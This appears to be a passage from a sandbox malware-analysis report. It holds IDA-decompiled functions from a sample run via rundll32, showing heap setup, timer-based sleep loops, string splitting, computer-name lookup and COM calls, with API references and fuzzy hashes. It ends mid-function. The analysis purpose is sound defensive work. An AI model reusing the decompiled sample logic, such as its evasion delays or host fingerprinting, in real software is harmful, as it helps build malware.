0x02e33fa7
0x02e33faa
0x02e33fae
0x02e33fb2
0x02e33fb7
0x02e3404f
0x02e3404f
0x00000000
0x02e34055
0x02e33fc2
0x02e33fcb
0x02e33fdf
0x02e33fe6
0x02e33ffb
0x02e34001
0x02e34009
0x00000000
0x00000000
0x00000000
0x00000000
0x02e3400b
0x02e3400b
0x02e3400b
0x02e34012
0x02e3401a
0x00000000
0x00000000
0x02e3401c
0x02e34025
0x00000000
0x00000000
0x00000000
0x02e34027
0x02e34029
0x02e3402c
0x02e3402c
0x02e3402f
0x02e34033
0x02e34036
0x02e3403c
0x02e3403f
0x02e34046
0x00000000
0x02e33fc2
0x02e33f3d
0x02e33f45
0x02e33f4b
0x02e33f4d
0x02e33f4d
0x02e33f50
0x02e33f52
0x00000000
0x02e33f52
0x02e33f2c
0x02e33f72
0x02e33f77
0x02e33f79
0x02e33f79
0x02e33f7c
0x02e33f7c
0x00000000

APIs

Part of subcall function 02E37A71: RtlAllocateHeap.NTDLL(00000000,00000000,02E34DB1), ref: 02E37A7D

lstrcpy.KERNEL32(69B25F45,00000020), ref: 02E33FE6
lstrcat.KERNEL32(69B25F45,00000020), ref: 02E33FFB
lstrcmp.KERNEL32(00000000,69B25F45), ref: 02E34012
lstrlen.KERNEL32(69B25F45), ref: 02E34036

Strings

, xrefs: 02E33F7F

Memory Dump Source

Source File: 00000004.00000002.816962986.0000000002E31000.00000020.10000000.00040000.00000000.sdmp, Offset: 02E30000, based on PE: true

Associated: 00000004.00000002.816950533.0000000002E30000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000004.00000002.816981198.0000000002E39000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000004.00000002.816986755.0000000002E3A000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000004.00000002.816995975.0000000002E3C000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2e30000_rundll32.jbxd

Similarity

API ID: AllocateHeaplstrcatlstrcmplstrcpylstrlen
String ID:
API String ID: 3214092121-3916222277
Opcode ID: 2da24c2d7636d5043a9c5e3a92b1c1acfd3a854f87a0ca02780ed9cdaaf0b57a
Instruction ID: e075e6a34a8af0747868da3f3b9e7701818cf436efe2eb5370f5d87b1842a4c6
Opcode Fuzzy Hash: 2da24c2d7636d5043a9c5e3a92b1c1acfd3a854f87a0ca02780ed9cdaaf0b57a
Instruction Fuzzy Hash: 3F51C371A80108EBDF22CF9AC488AEDBBB6FF4135AF55D096E815DB241C7719A51CF80

Uniqueness

Uniqueness Score: -1.00%

Function 02E361FE Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 94
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E02E361FE(void* __edx) {
				void* _v8;
				int _v12;
				WCHAR* _v16;
				void* __edi;
				void* __esi;
				void* _t23;
				intOrPtr _t24;
				void* _t26;
				intOrPtr _t32;
				intOrPtr _t35;
				intOrPtr _t38;
				intOrPtr _t42;
				void* _t45;
				void* _t50;
				void* _t52;

				_t50 = __edx;
				_v12 = 0;
				_t23 = E02E31CE6(0,  &_v8); // executed
				if(_t23 != 0) {
					_v8 = 0;
				}
				_t24 =  *0x2e3a348; // 0x206d5a8
				_t4 = _t24 + 0x2e3be30; // 0x4ea93d8
				_t5 = _t24 + 0x2e3bdd8; // 0x4f0053
				_t26 = E02E33A53( &_v16, _v8, _t5, _t4); // executed
				_t45 = _t26;
				if(_t45 == 0) {
					StrToIntExW(_v16, 0,  &_v12);
					_t45 = 8;
					if(_v12 < _t45) {
						_t45 = 1;
						__eflags = 1;
					} else {
						_t32 =  *0x2e3a348; // 0x206d5a8
						_t11 = _t32 + 0x2e3be24; // 0x4ea93cc
						_t48 = _t11;
						_t12 = _t32 + 0x2e3bdd8; // 0x4f0053
						_t52 = E02E3262D(_t11, _t12, _t11);
						_t59 = _t52;
						if(_t52 != 0) {
							_t35 =  *0x2e3a348; // 0x206d5a8
							_t13 = _t35 + 0x2e3be6e; // 0x30314549
							if(E02E33969(_t48, _t50, _t59, _v8, _t52, _t13, 0x14) == 0) {
								_t61 =  *0x2e3a2fc - 6;
								if( *0x2e3a2fc <= 6) {
									_t42 =  *0x2e3a348; // 0x206d5a8
									_t15 = _t42 + 0x2e3bdba; // 0x52384549
									E02E33969(_t48, _t50, _t61, _v8, _t52, _t15, 0x13);
								}
							}
							_t38 =  *0x2e3a348; // 0x206d5a8
							_t17 = _t38 + 0x2e3be68; // 0x4ea9410
							_t18 = _t38 + 0x2e3be40; // 0x680043
							_t45 = E02E3187F(_v8, 0x80000001, _t52, _t18, _t17);
							HeapFree( *0x2e3a2d8, 0, _t52);
						}
					}
					HeapFree( *0x2e3a2d8, 0, _v16);
				}
				_t54 = _v8;
				if(_v8 != 0) {
					E02E31544(_t54);
				}
				return _t45;
			}

0x02e361fe
0x02e3620e
0x02e36211
0x02e36218
0x02e3621a
0x02e3621a
0x02e3621d
0x02e36222
0x02e36229
0x02e36236
0x02e3623b
0x02e3623f
0x02e3624d
0x02e3625b
0x02e3625f
0x02e362f0
0x02e362f0
0x02e36265
0x02e36265
0x02e3626a
0x02e3626a
0x02e36271
0x02e3627d
0x02e3627f
0x02e36281
0x02e36283
0x02e3628a
0x02e3629c
0x02e3629e
0x02e362a5
0x02e362a7
0x02e362ae
0x02e362b9
0x02e362b9
0x02e362a5
0x02e362be
0x02e362c3
0x02e362ca
0x02e362e8
0x02e362ea
0x02e362ea
0x02e36281
0x02e362fc
0x02e362fc
0x02e362fe
0x02e36303
0x02e36305
0x02e36305
0x02e36310

APIs

StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,04EA93D8,00000000,?,7476F710,00000000,7476F730), ref: 02E3624D
HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,04EA9410,?,00000000,30314549,00000014,004F0053,04EA93CC), ref: 02E362EA
HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,02E3521B), ref: 02E362FC

Strings

Uqt, xrefs: 02E36253

Memory Dump Source

Source File: 00000004.00000002.816962986.0000000002E31000.00000020.10000000.00040000.00000000.sdmp, Offset: 02E30000, based on PE: true

Associated: 00000004.00000002.816950533.0000000002E30000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000004.00000002.816981198.0000000002E39000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000004.00000002.816986755.0000000002E3A000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000004.00000002.816995975.0000000002E3C000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2e30000_rundll32.jbxd

Similarity

API ID: FreeHeap
String ID: Uqt
API String ID: 3298025750-2320327147
Opcode ID: 10cb93a0318e83b0719fd0de15e3b548916f1410a6a4a640437e0f4677fd3e2d
Instruction ID: a4f079ae43b20ae8d62676853307ba89b79a71fb494d0c1c8fcb6897fb7b9ebb
Opcode Fuzzy Hash: 10cb93a0318e83b0719fd0de15e3b548916f1410a6a4a640437e0f4677fd3e2d
Instruction Fuzzy Hash: 5531AF329C020CBFCB129BA5DC4CE9E7BBDEB4470AF524069BA45AB120C7719A94DB50

Uniqueness

Uniqueness Score: -1.00%

Function 02E32689 Relevance: 6.1, APIs: 4, Instructions: 104memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(80000002), ref: 02E326E6
SysAllocString.OLEAUT32(02E323DF), ref: 02E3272A
SysFreeString.OLEAUT32(00000000), ref: 02E3273E
SysFreeString.OLEAUT32(00000000), ref: 02E3274C

Memory Dump Source

Source File: 00000004.00000002.816962986.0000000002E31000.00000020.10000000.00040000.00000000.sdmp, Offset: 02E30000, based on PE: true

Associated: 00000004.00000002.816950533.0000000002E30000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000004.00000002.816981198.0000000002E39000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000004.00000002.816986755.0000000002E3A000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000004.00000002.816995975.0000000002E3C000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2e30000_rundll32.jbxd

Similarity

API ID: String$AllocFree
String ID:
API String ID: 344208780-0
Opcode ID: 7e397b94b66a3260dbaeefa5bf698a138a99d11206eb1f3722b33f0b34e1492b
Instruction ID: 2a7e48df103dfa9095b0ce101b28e5fc9993d13bb2d14999c13ab9a83db0e3d4
Opcode Fuzzy Hash: 7e397b94b66a3260dbaeefa5bf698a138a99d11206eb1f3722b33f0b34e1492b
Instruction Fuzzy Hash: B6315075940209EFCB05CFA8D8C89EE7BB9FF48345B20942EFA4697250D7719981CF61

Uniqueness

Uniqueness Score: -1.00%

Function 02E32CEC Relevance: 6.0, APIs: 4, Instructions: 44
sleepthreadtimeCOMMON

Download Yara Rule

C-Code - Quality: 65%

			E02E32CEC(void* __ecx, intOrPtr _a4) {
				struct _FILETIME _v12;
				int _t13;
				signed int _t16;
				void* _t17;
				signed int _t18;
				unsigned int _t22;
				void* _t30;
				signed int _t34;

				_v12.dwLowDateTime = _v12.dwLowDateTime & 0x00000000;
				asm("stosd");
				do {
					_t13 = SwitchToThread();
					GetSystemTimeAsFileTime( &_v12);
					_t22 = _v12.dwHighDateTime;
					_t16 = (_t22 << 0x00000020 | _v12.dwLowDateTime) >> 5;
					_push(0);
					_push(0x13);
					_push(_t22 >> 5);
					_push(_t16);
					L02E38406();
					_t34 = _t16 + _t13;
					_t17 = E02E34D24(_a4, _t34);
					_t30 = _t17;
					_t18 = 3;
					Sleep(_t18 << (_t34 & 0x00000007)); // executed
				} while (_t30 == 1);
				return _t30;
			}

0x02e32cf1
0x02e32cfc
0x02e32cfd
0x02e32cfd
0x02e32d09
0x02e32d12
0x02e32d15
0x02e32d19
0x02e32d1b
0x02e32d20
0x02e32d21
0x02e32d22
0x02e32d2c
0x02e32d2f
0x02e32d36
0x02e32d3a
0x02e32d41
0x02e32d47
0x02e32d51

APIs

SwitchToThread.KERNEL32(?,00000001,?,?,?,02E372FE,?,?), ref: 02E32CFD
GetSystemTimeAsFileTime.KERNEL32(00000000,?,00000001,?,?,?,02E372FE,?,?), ref: 02E32D09
_aullrem.NTDLL(00000000,?,00000013,00000000), ref: 02E32D22

Part of subcall function 02E34D24: memcpy.NTDLL(00000000,00000002,?,?,?,00000000,00000000), ref: 02E34DC3

Sleep.KERNEL32(00000003,00000000,?,00000001,?,?,?,02E372FE,?,?), ref: 02E32D41

Memory Dump Source

Source File: 00000004.00000002.816962986.0000000002E31000.00000020.10000000.00040000.00000000.sdmp, Offset: 02E30000, based on PE: true

Associated: 00000004.00000002.816950533.0000000002E30000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000004.00000002.816981198.0000000002E39000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000004.00000002.816986755.0000000002E3A000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000004.00000002.816995975.0000000002E3C000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2e30000_rundll32.jbxd

Similarity

API ID: Time$FileSleepSwitchSystemThread_aullremmemcpy
String ID:
API String ID: 1610602887-0
Opcode ID: d58fb063307012d406a13db91b7ff74d307c1b04e914c2382056fbe1050b2e4f
Instruction ID: 35db3b5e860c4c1315c9e4d3db1b0d7f81c361c3da02240ddd3b667bf8a76b63
Opcode Fuzzy Hash: d58fb063307012d406a13db91b7ff74d307c1b04e914c2382056fbe1050b2e4f
Instruction Fuzzy Hash: 56F0C277B802087BD7159AA5CC5EFDF76B9DB84362F110524FA02E7340E7B89A41CAA0

Uniqueness

Uniqueness Score: -1.00%

Function 02E34076 Relevance: 4.6, APIs: 3, Instructions: 58
COMMON

Download Yara Rule

C-Code - Quality: 47%

			E02E34076(char* _a4, char** _a8) {
				char* _t7;
				char* _t11;
				char* _t14;
				char* _t16;
				char* _t17;
				char _t18;
				signed int _t20;
				signed int _t22;

				_t16 = _a4;
				_push(0x20);
				_t20 = 1;
				_push(_t16);
				while(1) {
					_t7 = StrChrA();
					if(_t7 == 0) {
						break;
					}
					_t20 = _t20 + 1;
					_push(0x20);
					_push( &(_t7[1]));
				}
				_t11 = E02E37A71(_t20 << 2);
				_a4 = _t11;
				if(_t11 != 0) {
					StrTrimA(_t16, 0x2e39278); // executed
					_t22 = 0;
					do {
						_t14 = StrChrA(_t16, 0x20);
						if(_t14 != 0) {
							 *_t14 = 0;
							do {
								_t14 =  &(_t14[1]);
								_t18 =  *_t14;
							} while (_t18 == 0x20 || _t18 == 9);
						}
						_t17 = _a4;
						 *(_t17 + _t22 * 4) = _t16;
						_t22 = _t22 + 1;
						_t16 = _t14;
					} while (_t14 != 0);
					 *_a8 = _t17;
				}
				return 0;
			}

0x02e3407a
0x02e34087
0x02e34089
0x02e3408a
0x02e34092
0x02e34092
0x02e34096
0x00000000
0x00000000
0x02e3408d
0x02e3408e
0x02e34091
0x02e34091
0x02e3409e
0x02e340a3
0x02e340a8
0x02e340b0
0x02e340b6
0x02e340b8
0x02e340bb
0x02e340bf
0x02e340c1
0x02e340c4
0x02e340c4
0x02e340c5
0x02e340c7
0x02e340c4
0x02e340d1
0x02e340d4
0x02e340d7
0x02e340d8
0x02e340da
0x02e340e1
0x02e340e1
0x02e340ed

APIs

StrChrA.SHLWAPI(?,00000020,00000000,04EA95FC,?,?,02E33DCB,?,04EA95FC), ref: 02E34092
StrTrimA.SHLWAPI(?,02E39278,00000002,?,02E33DCB,?,04EA95FC), ref: 02E340B0
StrChrA.SHLWAPI(?,00000020,?,02E33DCB,?,04EA95FC), ref: 02E340BB

Memory Dump Source

Source File: 00000004.00000002.816962986.0000000002E31000.00000020.10000000.00040000.00000000.sdmp, Offset: 02E30000, based on PE: true

Associated: 00000004.00000002.816950533.0000000002E30000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000004.00000002.816981198.0000000002E39000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000004.00000002.816986755.0000000002E3A000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000004.00000002.816995975.0000000002E3C000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2e30000_rundll32.jbxd

Similarity

API ID: Trim
String ID:
API String ID: 3043112668-0
Opcode ID: 427ce13f7f04717b2f87aaa4099ad7f562cea07d76502a9410b9fcd8dd25ace0
Instruction ID: 19ff5a77a0ed90472c557ca29698d2a1788823cc7a7503ea1821270dd379e304
Opcode Fuzzy Hash: 427ce13f7f04717b2f87aaa4099ad7f562cea07d76502a9410b9fcd8dd25ace0
Instruction Fuzzy Hash: 7801D471380345AFE7124A6ACC4CF677B8DEBC534AF44A021BA56CB2C2DA71C881CA61

Uniqueness

Uniqueness Score: -1.00%

Function 02E3789E Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 5
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E02E3789E(void* _a4) {
				char _t2;

				_t2 = RtlFreeHeap( *0x2e3a2d8, 0, _a4); // executed
				return _t2;
			}

0x02e378aa
0x02e378b0

APIs

RtlFreeHeap.NTDLL(00000000,00000000,02E34E3E,00000000,?,00000000,00000000), ref: 02E378AA

Strings

Uqt, xrefs: 02E378AA

Memory Dump Source

Source File: 00000004.00000002.816962986.0000000002E31000.00000020.10000000.00040000.00000000.sdmp, Offset: 02E30000, based on PE: true

Associated: 00000004.00000002.816950533.0000000002E30000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000004.00000002.816981198.0000000002E39000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000004.00000002.816986755.0000000002E3A000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000004.00000002.816995975.0000000002E3C000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2e30000_rundll32.jbxd

Similarity

API ID: FreeHeap
String ID: Uqt
API String ID: 3298025750-2320327147
Opcode ID: 45a03b496ad8375c8de9a9befef70b501350b5100d74f75583fbf303eb6508e5
Instruction ID: 285b2485eee71796510dccb54361cd6ef706ebc0e9f2cb0481a1b69fe95f381f
Opcode Fuzzy Hash: 45a03b496ad8375c8de9a9befef70b501350b5100d74f75583fbf303eb6508e5
Instruction Fuzzy Hash: 28B012759C0204ABCB114B02DE0CF057AA1B750702F504820B34800071837204F0FF15

Uniqueness

Uniqueness Score: -1.00%

Function 02E34BD5 Relevance: 3.1, APIs: 2, Instructions: 112
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E02E34BD5(void* __ecx, void* _a4, intOrPtr _a8, char _a12, intOrPtr _a16, char _a20, intOrPtr _a24, intOrPtr* _a28) {
				void* _v8;
				void* __esi;
				intOrPtr* _t35;
				void* _t40;
				intOrPtr* _t41;
				intOrPtr* _t43;
				intOrPtr* _t45;
				intOrPtr* _t50;
				intOrPtr* _t52;
				void* _t54;
				intOrPtr* _t55;
				intOrPtr* _t57;
				intOrPtr* _t61;
				intOrPtr* _t65;
				intOrPtr _t68;
				void* _t72;
				void* _t75;
				void* _t76;

				_t55 = _a4;
				_t35 =  *((intOrPtr*)(_t55 + 4));
				_a4 = 0;
				_t76 =  *((intOrPtr*)( *_t35 + 0x4c))(_t35, _a16, 0,  &_v8, 0, _t72, _t75, _t54, __ecx, __ecx);
				if(_t76 < 0) {
					L18:
					return _t76;
				}
				_t40 = E02E32689(_v8, _a8, _a12, _a20,  &_a20,  &_a12); // executed
				_t76 = _t40;
				if(_t76 >= 0) {
					_t61 = _a28;
					if(_t61 != 0 &&  *_t61 != 0) {
						_t52 = _v8;
						_t76 =  *((intOrPtr*)( *_t52 + 0x14))(_t52, _a24, 0, _t61, 0);
					}
					if(_t76 >= 0) {
						_t43 =  *_t55;
						_t68 =  *0x2e3a348; // 0x206d5a8
						_t20 = _t68 + 0x2e3b1fc; // 0x740053
						_t76 =  *((intOrPtr*)( *_t43 + 0x60))(_t43, _t20, _a16, 0, 0, _v8,  &_a4, 0);
						if(_t76 >= 0) {
							_t76 = E02E31061(_a4);
							if(_t76 >= 0) {
								_t65 = _a28;
								if(_t65 != 0 &&  *_t65 == 0) {
									_t50 = _a4;
									_t76 =  *((intOrPtr*)( *_t50 + 0x10))(_t50, _a24, 0, _t65, 0, 0);
								}
							}
						}
						_t45 = _a4;
						if(_t45 != 0) {
							 *((intOrPtr*)( *_t45 + 8))(_t45);
						}
						_t57 = __imp__#6;
						if(_a20 != 0) {
							 *_t57(_a20);
						}
						if(_a12 != 0) {
							 *_t57(_a12);
						}
					}
				}
				_t41 = _v8;
				 *((intOrPtr*)( *_t41 + 8))(_t41);
				goto L18;
			}

0x02e34bdb
0x02e34bde
0x02e34bee
0x02e34bf7
0x02e34bfb
0x02e34cc9
0x02e34ccf
0x02e34ccf
0x02e34c15
0x02e34c1a
0x02e34c1e
0x02e34c24
0x02e34c29
0x02e34c30
0x02e34c3f
0x02e34c3f
0x02e34c43
0x02e34c45
0x02e34c51
0x02e34c5c
0x02e34c67
0x02e34c6b
0x02e34c75
0x02e34c79
0x02e34c7b
0x02e34c80
0x02e34c87
0x02e34c97
0x02e34c97
0x02e34c80
0x02e34c79
0x02e34c99
0x02e34c9e
0x02e34ca3
0x02e34ca3
0x02e34ca6
0x02e34caf
0x02e34cb4
0x02e34cb4
0x02e34cb9
0x02e34cbe
0x02e34cbe
0x02e34cb9
0x02e34c43
0x02e34cc0
0x02e34cc6
0x00000000

APIs

Part of subcall function 02E32689: SysAllocString.OLEAUT32(80000002), ref: 02E326E6
Part of subcall function 02E32689: SysFreeString.OLEAUT32(00000000), ref: 02E3274C

SysFreeString.OLEAUT32(?), ref: 02E34CB4
SysFreeString.OLEAUT32(02E323DF), ref: 02E34CBE

Memory Dump Source

Source File: 00000004.00000002.816962986.0000000002E31000.00000020.10000000.00040000.00000000.sdmp, Offset: 02E30000, based on PE: true

Associated: 00000004.00000002.816950533.0000000002E30000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000004.00000002.816981198.0000000002E39000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000004.00000002.816986755.0000000002E3A000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000004.00000002.816995975.0000000002E3C000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2e30000_rundll32.jbxd

Similarity

API ID: String$Free$Alloc
String ID:
API String ID: 986138563-0
Opcode ID: 5add434a648154e753e4abfc898b571e0e4edd4f3cfcb89c2f0aa256c714487b
Instruction ID: 8b57930de4208e9c101fd708dfaa88c2171025a64c058f97f8293dc9ad87b25d
Opcode Fuzzy Hash: 5add434a648154e753e4abfc898b571e0e4edd4f3cfcb89c2f0aa256c714487b
Instruction Fuzzy Hash: 73315A71900108EFCB12DFA5C888CDBBB7AFFC97457158A58F8059B250D3329D91CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 02E33A53 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 43
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E02E33A53(intOrPtr* __edi, void* _a4, intOrPtr _a8, unsigned int _a12) {
				void* _t21;
				void* _t22;
				signed int _t24;
				intOrPtr* _t26;
				void* _t27;

				_t26 = __edi;
				if(_a4 == 0) {
					L2:
					_t27 = E02E378B3(_a4, 0x80000002, _a8, _a12,  &_a4,  &_a12);
					if(_t27 == 0) {
						_t24 = _a12 >> 1;
						if(_t24 == 0) {
							_t27 = 2;
							HeapFree( *0x2e3a2d8, 0, _a4);
						} else {
							_t21 = _a4;
							 *((short*)(_t21 + _t24 * 2 - 2)) = 0;
							 *_t26 = _t21;
						}
					}
					L6:
					return _t27;
				}
				_t22 = E02E35BB5(_a4, _a8, _a12, __edi); // executed
				_t27 = _t22;
				if(_t27 == 0) {
					goto L6;
				}
				goto L2;
			}

0x02e33a53
0x02e33a5b
0x02e33a72
0x02e33a8d
0x02e33a91
0x02e33a96
0x02e33a98
0x02e33aaa
0x02e33ab6
0x02e33a9a
0x02e33a9a
0x02e33a9f
0x02e33aa4
0x02e33aa4
0x02e33a98
0x02e33abc
0x02e33ac0
0x02e33ac0
0x02e33a67
0x02e33a6c
0x02e33a70
0x00000000
0x00000000
0x00000000

APIs

Part of subcall function 02E35BB5: SysFreeString.OLEAUT32(00000000), ref: 02E35C18

HeapFree.KERNEL32(00000000,00000000,00000000,80000002,7476F710,?,00000000,?,00000000,?,02E3623B,?,004F0053,04EA93D8,00000000,?), ref: 02E33AB6

Strings

Uqt, xrefs: 02E33AB6

Memory Dump Source

Source File: 00000004.00000002.816962986.0000000002E31000.00000020.10000000.00040000.00000000.sdmp, Offset: 02E30000, based on PE: true

Associated: 00000004.00000002.816950533.0000000002E30000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000004.00000002.816981198.0000000002E39000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000004.00000002.816986755.0000000002E3A000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000004.00000002.816995975.0000000002E3C000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2e30000_rundll32.jbxd

Similarity

API ID: Free$HeapString
String ID: Uqt
API String ID: 3806048269-2320327147
Opcode ID: 7d87649ec5e81b692b859ebc0b37b0b115218f1554d98e4d97c2ec4a04d527a1
Instruction ID: 7eb1ad48ece02ca8afd79c51d8de4fe026c49b42b85b6bea9675d83f38878d61
Opcode Fuzzy Hash: 7d87649ec5e81b692b859ebc0b37b0b115218f1554d98e4d97c2ec4a04d527a1
Instruction Fuzzy Hash: 7F014F32580519BBCF229F94CC08FEA7BA9EF08792F44C068FE049A220D771C960DBD0

Uniqueness

Uniqueness Score: -1.00%

Function 02E33DE0 Relevance: 3.0, APIs: 2, Instructions: 40
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E02E33DE0(void* __ecx) {
				signed int _v8;
				void* _t15;
				void* _t19;
				void* _t20;
				void* _t22;
				intOrPtr* _t23;

				_t23 = __imp__;
				_t20 = 0;
				_v8 = _v8 & 0;
				 *_t23(3, 0,  &_v8, _t19, _t22, __ecx); // executed
				_t10 = _v8;
				if(_v8 != 0) {
					_t20 = E02E37A71(_t10 + 1);
					if(_t20 != 0) {
						_t15 =  *_t23(3, _t20,  &_v8); // executed
						if(_t15 != 0) {
							 *((char*)(_v8 + _t20)) = 0;
						} else {
							E02E3789E(_t20);
							_t20 = 0;
						}
					}
				}
				return _t20;
			}

0x02e33de5
0x02e33df0
0x02e33df2
0x02e33df8
0x02e33dfa
0x02e33dff
0x02e33e08
0x02e33e0c
0x02e33e15
0x02e33e19
0x02e33e28
0x02e33e1b
0x02e33e1c
0x02e33e21
0x02e33e21
0x02e33e19
0x02e33e0c
0x02e33e31

APIs

GetComputerNameExA.KERNEL32(00000003,00000000,02E33730,00000000,00000000,?,775EC740,02E33730), ref: 02E33DF8

Part of subcall function 02E37A71: RtlAllocateHeap.NTDLL(00000000,00000000,02E34DB1), ref: 02E37A7D

GetComputerNameExA.KERNEL32(00000003,00000000,02E33730,02E33731,?,775EC740,02E33730), ref: 02E33E15

Part of subcall function 02E3789E: RtlFreeHeap.NTDLL(00000000,00000000,02E34E3E,00000000,?,00000000,00000000), ref: 02E378AA

Memory Dump Source

Source File: 00000004.00000002.816962986.0000000002E31000.00000020.10000000.00040000.00000000.sdmp, Offset: 02E30000, based on PE: true

Associated: 00000004.00000002.816950533.0000000002E30000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000004.00000002.816981198.0000000002E39000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000004.00000002.816986755.0000000002E3A000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000004.00000002.816995975.0000000002E3C000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2e30000_rundll32.jbxd

Similarity

API ID: ComputerHeapName$AllocateFree
String ID:
API String ID: 187446995-0
Opcode ID: eeba965b33495dbd8b1a1c285bb3c62d3c8c1f48a465957b64fc2bddf82b220c
Instruction ID: af4c2aede58c405cf6b95f347b3d25ba95908259dd6cd47d7ea88ab29ad2a320
Opcode Fuzzy Hash: eeba965b33495dbd8b1a1c285bb3c62d3c8c1f48a465957b64fc2bddf82b220c
Instruction Fuzzy Hash: E2F0BB66640215BADB22D6A6CC08FAF77EDDFC5645F115095A500D7140EA70DF01C6B0

Uniqueness

Uniqueness Score: -1.00%

Function 02E372C0 Relevance: 3.0, APIs: 2, Instructions: 26
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E02E372C0(signed int __edx, intOrPtr _a4) {
				void* _t3;
				void* _t5;
				void* _t7;
				void* _t8;
				void* _t9;
				signed int _t10;

				_t10 = __edx;
				_t3 = HeapCreate(0, 0x400000, 0); // executed
				 *0x2e3a2d8 = _t3;
				if(_t3 == 0) {
					_t8 = 8;
					return _t8;
				}
				 *0x2e3a1c8 = GetTickCount();
				_t5 = E02E32D54(_a4);
				if(_t5 == 0) {
					_t5 = E02E32CEC(_t9, _a4); // executed
					if(_t5 == 0) {
						if(E02E3534A(_t9) != 0) {
							 *0x2e3a300 = 1; // executed
						}
						_t7 = E02E310AD(_t10); // executed
						return _t7;
					}
				}
				return _t5;
			}

0x02e372c0
0x02e372c9
0x02e372cf
0x02e372d6
0x02e372da
0x00000000
0x02e372da
0x02e372e7
0x02e372ec
0x02e372f3
0x02e372f9
0x02e37300
0x02e37309
0x02e3730b
0x02e3730b
0x02e37315
0x00000000
0x02e37315
0x02e37300
0x02e3731a

APIs

HeapCreate.KERNEL32(00000000,00400000,00000000,02E33930,?), ref: 02E372C9
GetTickCount.KERNEL32 ref: 02E372DD

Memory Dump Source

Source File: 00000004.00000002.816962986.0000000002E31000.00000020.10000000.00040000.00000000.sdmp, Offset: 02E30000, based on PE: true

Associated: 00000004.00000002.816950533.0000000002E30000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000004.00000002.816981198.0000000002E39000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000004.00000002.816986755.0000000002E3A000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000004.00000002.816995975.0000000002E3C000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2e30000_rundll32.jbxd

Similarity

API ID: CountCreateHeapTick
String ID:
API String ID: 2177101570-0
Opcode ID: 51c39bfa58384c5de5604ae231f1b29c7fec383e7704a4912aec3774f3baa2bb
Instruction ID: abe4484f6b8b0ea186d1a50b82214a4e67b3e6f3815fdfa766c9d0bba80cd845
Opcode Fuzzy Hash: 51c39bfa58384c5de5604ae231f1b29c7fec383e7704a4912aec3774f3baa2bb
Instruction Fuzzy Hash: 18F039B0AC4205DADB122F729C4D719B6D57B0470BFA0E825FD8594291EBB1C490DE25

Uniqueness

Uniqueness Score: -1.00%

Function 02E35D05 Relevance: 1.6, APIs: 1, Instructions: 70
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E02E35D05(signed int* __ecx, intOrPtr _a4, signed int* _a8, signed int* _a12) {
				intOrPtr _v12;
				signed int _v20;
				intOrPtr _v24;
				signed int _v60;
				char _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t14;
				signed int* _t16;
				signed int _t25;
				signed int _t26;
				signed int* _t28;
				signed int _t30;

				_t28 = __ecx;
				_t14 =  *0x2e3a368; // 0x4ea9668
